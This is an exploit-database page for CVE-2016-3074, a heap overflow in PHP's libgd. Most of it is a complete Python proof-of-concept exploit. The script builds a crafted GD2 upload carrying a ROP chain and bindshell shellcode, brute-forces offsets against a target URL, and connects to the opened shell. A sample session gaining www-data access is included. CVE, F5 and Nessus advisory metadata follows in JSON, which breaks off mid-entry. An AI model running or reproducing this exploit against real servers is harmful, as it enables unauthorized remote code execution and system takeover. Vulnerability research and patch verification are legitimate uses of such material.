Search...

PHP LibGD Heap Buffer Overflow Exploit

2017-01-17T00:00:00

ID 1337DAY-ID-26713
Type zdt
Reporter Hans Jerry Illikainen
Modified 2017-01-17T00:00:00

Description

Proof of concept exploit for CVE-2016-3074 targeting Ubuntu 15.10 x86-64 with php5-gd and php5-fpm running behind nginx.

                                        
                                            #!/usr/bin/env python2
#
# PoC for CVE-2016-3074 targeting Ubuntu 15.10 x86-64 with php5-gd and
# php5-fpm running behind nginx.
#
# ,----
# | $ python exploit.py --bind-port 5555 http://1.2.3.4/upload.php
# | [*] this may take a while
# | [*] offset 912 of 10000...
# | [+] connected to 1.2.3.4:5555
# | id
# | uid=33(www-data) gid=33(www-data) groups=33(www-data)
# |
# | uname -a
# | Linux wily64 4.2.0-35-generic #40-Ubuntu SMP Tue Mar 15 22:15:45 UTC
# | 2016 x86_64 x86_64 x86_64 GNU/Linux
# |
# | dpkg -l|grep -E "php5-(fpm|gd)"
# | ii  php5-fpm       5.6.11+dfsg-1ubuntu3.1 ...
# | ii  php5-gd        5.6.11+dfsg-1ubuntu3.1 ...
# |
# | cat upload.php
# | &lt;?php
# |     imagecreatefromgd2($_FILES["file"]["tmp_name"]);
# | ?&gt;
# `----
#
# - Hans Jerry Illikainen
#
import sys
import os
import zlib
import socket
import threading
import argparse
import urlparse
from struct import pack

import requests

# non-optimized bindshell from binjitsu
#
# context(arch="amd64", os="linux")
# asm(shellcraft.bindsh(port, "ipv4"))
shellcode = [
    "\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x99\x0f\x05\x52\xba",
    "%(fam-and-port)s\x52\x6a\x10\x5a\x48\x89\xc5\x48\x89\xc7",
    "\x6a\x31\x58\x48\x89\xe6\x0f\x05\x6a\x32\x58\x48\x89\xef",
    "\x6a\x01\x5e\x0f\x05\x6a\x2b\x58\x48\x89\xef\x31\xf6\x99",
    "\x0f\x05\x48\x89\xc5\x6a\x03\x5e\x48\xff\xce\x78\x0b\x56",
    "\x6a\x21\x58\x48\x89\xef\x0f\x05\xeb\xef\x6a\x68\x48\xb8",
    "\x2f\x62\x69\x6e\x2f\x2f\x2f\x73\x50\x6a\x3b\x58\x48\x89",
    "\xe7\x31\xf6\x99\x0f\x05"
]

gadgets = [
    "\x90" * 40,

    # [16]
    #
    # 0xb6eca2:  popfq
    # 0xb6eca3:  callq  *%rsp
    pack("&lt;Q", 0xb6eca2),

    "%(pad)s",

    # [2]
    #
    # 0x4dbe8c:  add  $0xd8,%rsp
    # 0x4dbe93:  retq
    pack("&lt;Q", 0x4dbe8c),

    "\x90" * 48,

    # [1]
    #
    # (gdb) x/x {void *}($rsp + 8)
    # 0x12d7d60:  0x9090909090909090
    #
    # 0xa91f35:  rex.WXB  pop %r14
    # 0xa91f37:  mov      $0x3,%bh
    # 0xa91f39:  pop      %rsp
    # 0xa91f3a:  retq
    pack("&lt;Q", 0xa91f35),

    "\x90" * 152,

    # [0]
    #
    # (gdb) x/i $rip
    # =&gt; 0x7f91acf61f46:  callq  *0x70(%rax)
    #
    # (gdb) x/gx 0x432b80
    # 0x432b80:  0x0000000000547880
    #
    # (gdb) x/3i 0x0000000000547880
    # 0x547880:  push   %rbx
    # 0x547881:  mov    %rdi,%rbx
    # 0x547884:  callq  *0x20(%rdi)
    pack("&lt;Q", 0x432b80 - 0x70),

    # [3]
    #
    # 0x463e2c:  pop  %rbx
    # 0x463e2d:  retq
    pack("&lt;Q", 0x463e2c),

    # [7]
    #
    # 0x463b1d:  pop  %r12
    # 0x463b1f:  retq
    pack("&lt;Q", 0x463b1d),

    # [4]
    #
    # 0x473053:  pop  %rax
    # 0x473054:  retq
    pack("&lt;Q", 0x473053),

    # [6]
    #
    # 0xa8bc37:  push  %rdx
    # 0xa8bc38:  jmpq  *%rbx
    pack("&lt;Q", 0xa8bc37),

    # [5]
    #
    # 0x7b2eaf:  mov   %r9,%rdx
    # 0x7b2eb2:  jmpq  *%rax
    pack("&lt;Q", 0x7b2eaf),

    # [8]
    #
    # 0x552768:  mov  %rdi,%rax
    # 0x55276b:  retq
    pack("&lt;Q", 0x552768),

    # [9]
    #
    # 0x463e2c:  pop  %rbx
    # 0x463e2d:  retq
    pack("&lt;Q", 0x463e2c),
    pack("&lt;Q", 0xfffff000),

    # [10]
    #
    # 0xb6c734:  and  %ebx,%eax
    # 0xb6c736:  es retq
    pack("&lt;Q", 0xb6c734),

    # [11]
    #
    # 0x4c93e9:  xchg  %eax,%ebx
    # 0x4c93ea:  retq
    pack("&lt;Q", 0x4c93e9),

    # [12]
    #
    # 0x406a08:  pop  %rcx (len, 0x5555)
    # 0x406a09:  retq
    pack("&lt;Q", 0x406a08),
    pack("&lt;Q", 0x5555),

    # [13]
    #
    # 0xaf58fd:  pop  %rdx (PROT_READ|PROT_WRITE|PROT_EXEC)
    # 0xaf58fe:  retq
    pack("&lt;Q", 0xaf58fd),
    pack("&lt;Q", 7),

    # [14]
    #
    # 0x473053:  pop  %rax (mprotect)
    # 0x473054:  retq
    pack("&lt;Q", 0x473053),
    pack("&lt;Q", 125),

    # [15]
    #
    # 0x53f9f8:  int    $0x80
    # 0x53f9fa:  mov    0x38(%r12),%rsi
    # 0x53f9ff:  mov    $0x8f,%edi
    # 0x53fa04:  callq  *0x28(%r12)
    pack("&lt;Q", 0x53f9f8),

    "\x90" * 100,
]

# gd.h: #define gdMaxColors 256
gd_max_colors = 256


def make_gd2(chunks):
    gd2 = [
        "gd2\x00",                    # signature
        pack("&gt;H", 2),                # version
        pack("&gt;H", 1),                # image size (x)
        pack("&gt;H", 1),                # image size (y)
        pack("&gt;H", 0x40),             # chunk size (0x40 &lt;= cs &lt;= 0x80)
        pack("&gt;H", 2),                # format (GD2_FMT_COMPRESSED)
        pack("&gt;H", 1),                # num of chunks wide
        pack("&gt;H", len(chunks))       # num of chunks high
    ]
    colors = [
        pack("&gt;B", 0),                # trueColorFlag
        pack("&gt;H", 0),                # im-&gt;colorsTotal
        pack("&gt;I", 0),                # im-&gt;transparent
        pack("&gt;I", 0) * gd_max_colors # red[i], green[i], blue[i], alpha[i]
    ]

    offset = len("".join(gd2)) + len("".join(colors)) + len(chunks) * 8
    for data, size in chunks:
        gd2.append(pack("&gt;I", offset)) # cidx[i].offset
        gd2.append(pack("&gt;I", size))   # cidx[i].size
        offset += size

    return "".join(gd2 + colors + [data for data, size in chunks])


def connect(host, port):
    addr = socket.gethostbyname(host)
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((addr, port))
    except socket.error:
        return

    print("\n[+] connected to %s:%d" % (host, port))
    if os.fork() == 0:
        while True:
            try:
                data = sock.recv(8192)
            except KeyboardInterrupt:
                sys.exit("\n[!] receiver aborting")
            if data == "":
                sys.exit("[!] receiver aborting")
            sys.stdout.write(data)
    else:
        while True:
            try:
                cmd = sys.stdin.readline()
            except KeyboardInterrupt:
                sock.close()
                sys.exit("[!] sender aborting")
            sock.send(cmd)


def send_gd2(url, gd2, code):
    files = {"file": gd2}
    try:
        req = requests.post(url, files=files, timeout=5)
        code.append(req.status_code)
    except requests.exceptions.ReadTimeout:
        pass


def get_payload(offset, port):
    rop = "".join(gadgets) % {"pad": "\x90" * offset}

    fam_and_port = pack("&lt;I", (socket.AF_INET | (socket.htons(port) &lt;&lt; 16)))
    sc = "".join(shellcode) % {"fam-and-port": fam_and_port}

    return rop + sc


def get_args():
    p = argparse.ArgumentParser()
    p.add_argument("--threads", type=int, default=20)
    p.add_argument("--bind-port", type=int, default=8000)
    p.add_argument("--offsets", type=int, default=[0, 10000], nargs=2)
    p.add_argument("url")
    return p.parse_args()


def main():
    args = get_args()
    host = urlparse.urlparse(args.url).netloc.split(":")[0]

    print("[*] this may take a while")
    for i in range(args.offsets[0], args.offsets[1]):
        sys.stdout.write("\r[*] offset %d of %d..." % (i, args.offsets[1]))
        sys.stdout.flush()

        valid = zlib.compress("A" * 100, 0)
        payload = get_payload(i, args.bind_port)
        gd2 = make_gd2([(valid, len(valid)), (payload, 0xffffffff)])

        threads = []
        code = []
        for _ in range(args.threads):
            t = threading.Thread(target=send_gd2, args=(args.url, gd2, code))
            t.start()
            threads.append(t)

        for t in threads:
            t.join()

        if 404 in code:
            sys.exit("\n[-] 404: %s" % args.url)
        connect(host, args.bind_port)

    print("\n[-] nope...")

if __name__ == "__main__":
    main()

#  0day.today [2018-01-04]  #

JSON Vulners Source

Initial Source

{"href": "https://0day.today/exploit/description/26713", "sourceData": "#!/usr/bin/env python2\r\n#\r\n# PoC for CVE-2016-3074 targeting Ubuntu 15.10 x86-64 with php5-gd and\r\n# php5-fpm running behind nginx.\r\n#\r\n# ,----\r\n# | $ python exploit.py --bind-port 5555 http://1.2.3.4/upload.php\r\n# | [*] this may take a while\r\n# | [*] offset 912 of 10000...\r\n# | [+] connected to 1.2.3.4:5555\r\n# | id\r\n# | uid=33(www-data) gid=33(www-data) groups=33(www-data)\r\n# |\r\n# | uname -a\r\n# | Linux wily64 4.2.0-35-generic #40-Ubuntu SMP Tue Mar 15 22:15:45 UTC\r\n# | 2016 x86_64 x86_64 x86_64 GNU/Linux\r\n# |\r\n# | dpkg -l|grep -E \"php5-(fpm|gd)\"\r\n# | ii php5-fpm 5.6.11+dfsg-1ubuntu3.1 ...\r\n# | ii php5-gd 5.6.11+dfsg-1ubuntu3.1 ...\r\n# |\r\n# | cat upload.php\r\n# | <?php\r\n# | imagecreatefromgd2($_FILES[\"file\"][\"tmp_name\"]);\r\n# | ?>\r\n# `----\r\n#\r\n# - Hans Jerry Illikainen\r\n#\r\nimport sys\r\nimport os\r\nimport zlib\r\nimport socket\r\nimport threading\r\nimport argparse\r\nimport urlparse\r\nfrom struct import pack\r\n\r\nimport requests\r\n\r\n# non-optimized bindshell from binjitsu\r\n#\r\n# context(arch=\"amd64\", os=\"linux\")\r\n# asm(shellcraft.bindsh(port, \"ipv4\"))\r\nshellcode = [\r\n \"\\x6a\\x29\\x58\\x6a\\x02\\x5f\\x6a\\x01\\x5e\\x99\\x0f\\x05\\x52\\xba\",\r\n \"%(fam-and-port)s\\x52\\x6a\\x10\\x5a\\x48\\x89\\xc5\\x48\\x89\\xc7\",\r\n \"\\x6a\\x31\\x58\\x48\\x89\\xe6\\x0f\\x05\\x6a\\x32\\x58\\x48\\x89\\xef\",\r\n \"\\x6a\\x01\\x5e\\x0f\\x05\\x6a\\x2b\\x58\\x48\\x89\\xef\\x31\\xf6\\x99\",\r\n \"\\x0f\\x05\\x48\\x89\\xc5\\x6a\\x03\\x5e\\x48\\xff\\xce\\x78\\x0b\\x56\",\r\n \"\\x6a\\x21\\x58\\x48\\x89\\xef\\x0f\\x05\\xeb\\xef\\x6a\\x68\\x48\\xb8\",\r\n \"\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x2f\\x73\\x50\\x6a\\x3b\\x58\\x48\\x89\",\r\n \"\\xe7\\x31\\xf6\\x99\\x0f\\x05\"\r\n]\r\n\r\ngadgets = [\r\n \"\\x90\" * 40,\r\n\r\n # [16]\r\n #\r\n # 0xb6eca2: popfq\r\n # 0xb6eca3: callq *%rsp\r\n pack(\"<Q\", 0xb6eca2),\r\n\r\n \"%(pad)s\",\r\n\r\n # [2]\r\n #\r\n # 0x4dbe8c: add $0xd8,%rsp\r\n # 0x4dbe93: retq\r\n pack(\"<Q\", 0x4dbe8c),\r\n\r\n \"\\x90\" * 48,\r\n\r\n # [1]\r\n #\r\n # (gdb) x/x {void *}($rsp + 8)\r\n # 0x12d7d60: 0x9090909090909090\r\n #\r\n # 0xa91f35: rex.WXB pop %r14\r\n # 0xa91f37: mov $0x3,%bh\r\n # 0xa91f39: pop %rsp\r\n # 0xa91f3a: retq\r\n pack(\"<Q\", 0xa91f35),\r\n\r\n \"\\x90\" * 152,\r\n\r\n # [0]\r\n #\r\n # (gdb) x/i $rip\r\n # => 0x7f91acf61f46: callq *0x70(%rax)\r\n #\r\n # (gdb) x/gx 0x432b80\r\n # 0x432b80: 0x0000000000547880\r\n #\r\n # (gdb) x/3i 0x0000000000547880\r\n # 0x547880: push %rbx\r\n # 0x547881: mov %rdi,%rbx\r\n # 0x547884: callq *0x20(%rdi)\r\n pack(\"<Q\", 0x432b80 - 0x70),\r\n\r\n # [3]\r\n #\r\n # 0x463e2c: pop %rbx\r\n # 0x463e2d: retq\r\n pack(\"<Q\", 0x463e2c),\r\n\r\n # [7]\r\n #\r\n # 0x463b1d: pop %r12\r\n # 0x463b1f: retq\r\n pack(\"<Q\", 0x463b1d),\r\n\r\n # [4]\r\n #\r\n # 0x473053: pop %rax\r\n # 0x473054: retq\r\n pack(\"<Q\", 0x473053),\r\n\r\n # [6]\r\n #\r\n # 0xa8bc37: push %rdx\r\n # 0xa8bc38: jmpq *%rbx\r\n pack(\"<Q\", 0xa8bc37),\r\n\r\n # [5]\r\n #\r\n # 0x7b2eaf: mov %r9,%rdx\r\n # 0x7b2eb2: jmpq *%rax\r\n pack(\"<Q\", 0x7b2eaf),\r\n\r\n # [8]\r\n #\r\n # 0x552768: mov %rdi,%rax\r\n # 0x55276b: retq\r\n pack(\"<Q\", 0x552768),\r\n\r\n # [9]\r\n #\r\n # 0x463e2c: pop %rbx\r\n # 0x463e2d: retq\r\n pack(\"<Q\", 0x463e2c),\r\n pack(\"<Q\", 0xfffff000),\r\n\r\n # [10]\r\n #\r\n # 0xb6c734: and %ebx,%eax\r\n # 0xb6c736: es retq\r\n pack(\"<Q\", 0xb6c734),\r\n\r\n # [11]\r\n #\r\n # 0x4c93e9: xchg %eax,%ebx\r\n # 0x4c93ea: retq\r\n pack(\"<Q\", 0x4c93e9),\r\n\r\n # [12]\r\n #\r\n # 0x406a08: pop %rcx (len, 0x5555)\r\n # 0x406a09: retq\r\n pack(\"<Q\", 0x406a08),\r\n pack(\"<Q\", 0x5555),\r\n\r\n # [13]\r\n #\r\n # 0xaf58fd: pop %rdx (PROT_READ|PROT_WRITE|PROT_EXEC)\r\n # 0xaf58fe: retq\r\n pack(\"<Q\", 0xaf58fd),\r\n pack(\"<Q\", 7),\r\n\r\n # [14]\r\n #\r\n # 0x473053: pop %rax (mprotect)\r\n # 0x473054: retq\r\n pack(\"<Q\", 0x473053),\r\n pack(\"<Q\", 125),\r\n\r\n # [15]\r\n #\r\n # 0x53f9f8: int $0x80\r\n # 0x53f9fa: mov 0x38(%r12),%rsi\r\n # 0x53f9ff: mov $0x8f,%edi\r\n # 0x53fa04: callq *0x28(%r12)\r\n pack(\"<Q\", 0x53f9f8),\r\n\r\n \"\\x90\" * 100,\r\n]\r\n\r\n# gd.h: #define gdMaxColors 256\r\ngd_max_colors = 256\r\n\r\n\r\ndef make_gd2(chunks):\r\n gd2 = [\r\n \"gd2\\x00\", # signature\r\n pack(\">H\", 2), # version\r\n pack(\">H\", 1), # image size (x)\r\n pack(\">H\", 1), # image size (y)\r\n pack(\">H\", 0x40), # chunk size (0x40 <= cs <= 0x80)\r\n pack(\">H\", 2), # format (GD2_FMT_COMPRESSED)\r\n pack(\">H\", 1), # num of chunks wide\r\n pack(\">H\", len(chunks)) # num of chunks high\r\n ]\r\n colors = [\r\n pack(\">B\", 0), # trueColorFlag\r\n pack(\">H\", 0), # im->colorsTotal\r\n pack(\">I\", 0), # im->transparent\r\n pack(\">I\", 0) * gd_max_colors # red[i], green[i], blue[i], alpha[i]\r\n ]\r\n\r\n offset = len(\"\".join(gd2)) + len(\"\".join(colors)) + len(chunks) * 8\r\n for data, size in chunks:\r\n gd2.append(pack(\">I\", offset)) # cidx[i].offset\r\n gd2.append(pack(\">I\", size)) # cidx[i].size\r\n offset += size\r\n\r\n return \"\".join(gd2 + colors + [data for data, size in chunks])\r\n\r\n\r\ndef connect(host, port):\r\n addr = socket.gethostbyname(host)\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n try:\r\n sock.connect((addr, port))\r\n except socket.error:\r\n return\r\n\r\n print(\"\\n[+] connected to %s:%d\" % (host, port))\r\n if os.fork() == 0:\r\n while True:\r\n try:\r\n data = sock.recv(8192)\r\n except KeyboardInterrupt:\r\n sys.exit(\"\\n[!] receiver aborting\")\r\n if data == \"\":\r\n sys.exit(\"[!] receiver aborting\")\r\n sys.stdout.write(data)\r\n else:\r\n while True:\r\n try:\r\n cmd = sys.stdin.readline()\r\n except KeyboardInterrupt:\r\n sock.close()\r\n sys.exit(\"[!] sender aborting\")\r\n sock.send(cmd)\r\n\r\n\r\ndef send_gd2(url, gd2, code):\r\n files = {\"file\": gd2}\r\n try:\r\n req = requests.post(url, files=files, timeout=5)\r\n code.append(req.status_code)\r\n except requests.exceptions.ReadTimeout:\r\n pass\r\n\r\n\r\ndef get_payload(offset, port):\r\n rop = \"\".join(gadgets) % {\"pad\": \"\\x90\" * offset}\r\n\r\n fam_and_port = pack(\"<I\", (socket.AF_INET | (socket.htons(port) << 16)))\r\n sc = \"\".join(shellcode) % {\"fam-and-port\": fam_and_port}\r\n\r\n return rop + sc\r\n\r\n\r\ndef get_args():\r\n p = argparse.ArgumentParser()\r\n p.add_argument(\"--threads\", type=int, default=20)\r\n p.add_argument(\"--bind-port\", type=int, default=8000)\r\n p.add_argument(\"--offsets\", type=int, default=[0, 10000], nargs=2)\r\n p.add_argument(\"url\")\r\n return p.parse_args()\r\n\r\n\r\ndef main():\r\n args = get_args()\r\n host = urlparse.urlparse(args.url).netloc.split(\":\")[0]\r\n\r\n print(\"[*] this may take a while\")\r\n for i in range(args.offsets[0], args.offsets[1]):\r\n sys.stdout.write(\"\\r[*] offset %d of %d...\" % (i, args.offsets[1]))\r\n sys.stdout.flush()\r\n\r\n valid = zlib.compress(\"A\" * 100, 0)\r\n payload = get_payload(i, args.bind_port)\r\n gd2 = make_gd2([(valid, len(valid)), (payload, 0xffffffff)])\r\n\r\n threads = []\r\n code = []\r\n for _ in range(args.threads):\r\n t = threading.Thread(target=send_gd2, args=(args.url, gd2, code))\r\n t.start()\r\n threads.append(t)\r\n\r\n for t in threads:\r\n t.join()\r\n\r\n if 404 in code:\r\n sys.exit(\"\\n[-] 404: %s\" % args.url)\r\n connect(host, args.bind_port)\r\n\r\n print(\"\\n[-] nope...\")\r\n\r\nif __name__ == \"__main__\":\r\n main()\n\n# 0day.today [2018-01-04] #", "bulletinFamily": "exploit", "modified": "2017-01-17T00:00:00", "title": "PHP LibGD Heap Buffer Overflow Exploit", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 7.5}, "sourceHref": "https://0day.today/exploit/26713", "cvelist": ["CVE-2016-3074"], "description": "Proof of concept exploit for CVE-2016-3074 targeting Ubuntu 15.10 x86-64 with php5-gd and php5-fpm running behind nginx.", "viewCount": 8, "published": "2017-01-17T00:00:00", "edition": 1, "id": "1337DAY-ID-26713", "type": "zdt", "lastseen": "2018-01-04T13:02:09", "reporter": "Hans Jerry Illikainen", "enchantments": {"score": {"value": 7.8, "vector": "NONE", "modified": "2018-01-04T13:02:09", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2016-3074"]}, {"type": "f5", "idList": ["F5:K34958244", "SOL34958244"]}, {"type": "nessus", "idList": ["FEDORA_2016-7D6CBCADCA.NASL", "FREEBSD_PKG_5764C63410D211E694FA002590263BF5.NASL", "GENTOO_GLSA-201607-04.NASL", "DEBIAN_DSA-3556.NASL", "EULEROS_SA-2019-2583.NASL", "JUNIPER_JSA10798.NASL", "UBUNTU_USN-2987-1.NASL", "SLACKWARE_SSA_2016-120-02.NASL", "FEDORA_2016-0C57B12C7B.NASL", "FEDORA_2016-5F91F43826.NASL"]}, {"type": "debian", "idList": ["DEBIAN:DSA-3556-1:CAE3D", "DEBIAN:DSA-3602-1:52B21"]}, {"type": "threatpost", "idList": ["THREATPOST:2EDAD602D032B0A6F91130A32BBBBE6C"]}, {"type": "exploitdb", "idList": ["EDB-ID:39736"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:1108993BC3B3774C486440F61128433E"]}, {"type": "slackware", "idList": ["SSA-2016-120-02"]}, {"type": "zdt", "idList": ["1337DAY-ID-25407"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:140537", "PACKETSTORM:136757"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310807957", "OPENVAS:703556", "OPENVAS:1361412562310703556", "OPENVAS:1361412562311220192583", "OPENVAS:1361412562310842778", "OPENVAS:1361412562310140289", "OPENVAS:1361412562310808313", "OPENVAS:1361412562310120687", "OPENVAS:1361412562310131297", "OPENVAS:1361412562310807994"]}, {"type": "archlinux", "idList": ["ASA-201605-8"]}, {"type": "seebug", "idList": ["SSV:92626"]}, {"type": "fedora", "idList": ["FEDORA:73AFA606D3C7", "FEDORA:4C10A6062BF1", "FEDORA:49506619160F"]}, {"type": "freebsd", "idList": ["5764C634-10D2-11E6-94FA-002590263BF5"]}, {"type": "gentoo", "idList": ["GLSA-201607-04", "GLSA-201611-22"]}, {"type": "ubuntu", "idList": ["USN-2987-1"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:29A67C6EFF8B00905B423AF785FD3E4C"]}, {"type": "amazon", "idList": ["ALAS-2016-698"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2016:1274-1", "OPENSUSE-SU-2016:1553-1"]}, {"type": "cloudlinux", "idList": ["CLSA-2020:1605798462"]}, {"type": "redhat", "idList": ["RHSA-2016:2750"]}], "modified": "2018-01-04T13:02:09", "rev": 2}, "vulnersScore": 7.8}, "references": []}

{"cve": [{"lastseen": "2020-10-03T12:10:44", "description": "Integer signedness error in GD Graphics Library 2.1.1 (aka libgd or libgd2) allows remote attackers to cause a denial of service (crash) or potentially execute arbitrary code via crafted compressed gd2 data, which triggers a heap-based buffer overflow.", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-04-26T14:59:00", "title": "CVE-2016-3074", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3074"], "modified": "2018-10-09T19:59:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "cpe:/a:libgd:libgd:2.1.1", "cpe:/o:debian:debian_linux:7.0"], "id": "CVE-2016-3074", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3074", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:libgd:libgd:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2017-06-08T00:16:33", "bulletinFamily": "software", "cvelist": ["CVE-2016-3074"], "edition": 1, "description": "\nF5 Product Development has assigned ID 596111 (BIG-IQ) and ID 596113 (Enterprise Manager), and has evaluated the currently supported releases for potential vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H34958244 on the **Diagnostics** > **Identified** > **Low** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP AAM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP ASM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP DNS| None| 12.0.0 - 12.1.0| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP PEM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WOM| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| 3.1.1| None| Low| PHP \nFirePass| None| 7.0.0| Not vulnerable| None \nBIG-IQ Cloud| 4.0.0 - 4.5.0| None| Low| PHP \nBIG-IQ Device| 4.2.0 - 4.5.0| None| Low| PHP \nBIG-IQ Security| 4.0.0 - 4.5.0| None| Low| PHP \nBIG-IQ ADC| 4.5.0| None| Low| PHP \nBIG-IQ Centralized Management| 4.6.0| None| Low| PHP \nBIG-IQ Cloud and Orchestration| 1.0.0| None| Low| PHP \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 MobileSafe| None| 1.0.0| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| None| 5.0.0 \n4.0.0 - 4.4.0 \n3.3.2 - 3.5.1| Not vulnerable| None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the **Severity** values published in the previous table. The **Severity** values and other security vulnerability parameters are defined in [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>).\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "modified": "2017-04-05T00:46:00", "published": "2016-06-01T02:37:00", "href": "https://support.f5.com/csp/article/K34958244", "id": "F5:K34958244", "title": "PHP vulnerability CVE-2016-3074", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-26T17:23:24", "bulletinFamily": "software", "cvelist": ["CVE-2016-3074"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the **Severity** values published in the previous table. The **Severity** values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n", "modified": "2016-05-31T00:00:00", "published": "2016-05-31T00:00:00", "id": "SOL34958244", "href": "http://support.f5.com/kb/en-us/solutions/public/k/34/sol34958244.html", "type": "f5", "title": "SOL34958244 - PHP vulnerability CVE-2016-3074", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-01-01T03:19:29", "description": "According to its self-reported version number, the remote Juniper\nJunos device is affected by an integer signedness error in the\nincluded GD Graphics Library (libgd) when handling compressed GD2 data\ndue to improper validation of user-supplied input. An unauthenticated,\nremote attacker can exploit this, via specially crafted compressed GD2\ndata, to cause a heap-based buffer overflow, resulting in a denial of\nservice condition or the execution of arbitrary code.", "edition": 25, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-07-31T00:00:00", "title": "Juniper Junos libgd Compressed GD2 Data RCE (JSA10798)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3074"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:juniper:junos"], "id": "JUNIPER_JSA10798.NASL", "href": 